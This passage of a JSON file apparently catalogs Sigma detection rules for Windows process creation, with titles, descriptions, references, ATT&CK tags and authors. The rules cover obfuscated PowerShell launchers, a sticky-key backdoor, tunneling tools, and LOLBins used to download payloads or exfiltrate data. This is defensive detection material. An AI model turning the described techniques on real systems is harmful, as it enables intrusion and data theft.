"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ], - "creation_date": "2022/09/06", - "filename": "proc_creation_win_inline_win_api_access.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", - "value": "Suspicious Debugger Registration Cmdline", - "meta": { - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" - ], - "creation_date": "2019/09/06", - "filename": "proc_creation_win_install_reg_debugger_backdoor.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", - "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "value": "Interactive AT Job", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", - "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_interactive_at.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely (at.exe deprecated as of Windows 8)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_invoke_obfuscation_clip.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation", - "meta": { - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/11/08", - "filename": "proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "proc_creation_win_invoke_obfuscation_stdin.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", - "value": "Invoke-Obfuscation VAR+ Launcher", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "proc_creation_win_invoke_obfuscation_var.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_invoke_obfuscation_via_rundll.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "value": "Invoke-Obfuscation Via Stdin", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "value": "Invoke-Obfuscation Via Use Clip", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "value": "Invoke-Obfuscation Via Use MSHTA", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "uuid": "36c5146c-d127-4f85-8e21-01bf62355d5a", - "value": "Invoke-Obfuscation Via Use Rundll32", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/08", - "filename": "proc_creation_win_invoke_obfuscation_via_use_rundll32.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", - "value": "IOX Tunneling Tool", - "meta": { - "refs": [ - "https://github.com/EddieIvan01/iox", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2022/10/08", - "filename": "proc_creation_win_iox.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", - "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", - "value": "Jlaive Usage For Assembly Execution In-Memory", - "meta": { - "refs": [ - "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", - "https://github.com/ch2sh/Jlaive", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/05/24", - "filename": "proc_creation_win_jlaive_batch_execution.yml", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", - "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", - "value": "Suspicious Ldifde Command Usage", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1564968845726580736", - "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/09/02", - "filename": "proc_creation_win_ldifde_file_load.yml", - "author": "@gott_cyber", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", - "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", - "value": "MSHTA Spwaned by SVCHOST", - "meta": { - "refs": [ - "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005" - ], - "creation_date": "2018/06/07", - "filename": "proc_creation_win_lethalhta.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Local accounts, System Owner/User discovery using operating systems utilities", - "uuid": "502b42de-4306-40b4-9596-6f590c81f073", - "value": "Local Accounts Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "attack.t1087.001" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_local_system_owner_account_discovery.yml", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrator or user enumerates local users for legitimate reason" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", - "value": "Use of LogMeIn Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/11", - "filename": "proc_creation_win_logmein.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", - "value": "Logon Scripts (UserInitMprLogonScript)", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1037/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" - ], - "tags": [ - "attack.t1037.001", - "attack.persistence" - ], - "creation_date": "2019/01/12", - "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", - "level": "high", - "falsepositive": [ - "Exclude legitimate logon scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.", - "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", - "value": "New Lolbin Process by Office Applications", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", - "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", - "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_lolbins_by_office_applications.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.", - "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", - "value": "Lolbins Process Creation with WmiPrvse", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", - "value": "Use of Adplus.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", - "https://twitter.com/nas_bench/status/1534916659676422152", - "https://twitter.com/nas_bench/status/1534915321856917506", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" - ], - "creation_date": "2022/06/09", - "filename": "proc_creation_win_lolbin_adplus.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of Adplus" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", - "value": "Suspicious aspnet_compiler.exe Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2021/11/24", - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Performs execution of specified file, can be used for defensive evasion.", - "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", - "value": "Suspicious Subsystem for Linux Bash Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Bash/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/11/24", - "filename": "proc_creation_win_lolbin_bash.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user downloads file by using CertOC.exe", - "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "value": "Suspicious File Download via CertOC.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/05/16", - "filename": "proc_creation_win_lolbin_certoc_download.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", - "value": "Custom Class Execution via Xwizard", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", - "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "value": "Execution via CL_Invocation.ps1", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/14", - "filename": "proc_creation_win_lolbin_cl_invocation.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", - "value": "CL_LoadAssembly.ps1 Proxy Execution", - "meta": { - "refs": [ - "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", - "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/05/21", - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Microsoft signed script to execute commands", - "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", - "value": "CL_Mutexverifiers.ps1 Proxy Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/05/21", - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", - "author": "oscd.community, Natalia Shornikova, frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", - "value": "Suspicious Cmdl32 Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", - "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2021/11/03", - "filename": "proc_creation_win_lolbin_cmdl32.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", - "value": "Suspicious ConfigSecurityPolicy Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", - "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", - "value": "GatherNetworkInfo.vbs Script Usage", - "meta": { - "refs": [ - "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" - ], - "creation_date": "2022/01/03", - "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", - "author": "blueteamer8699", - "level": "medium", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", - "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", - "value": "Suspicious CustomShellHost Execution", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/180", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_customshellhost.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", - "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "meta": { - "refs": [ - "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", - "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567" - ], - "creation_date": "2021/09/30", - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", - "value": "DeviceCredentialDeployment Execution", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/147", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" - 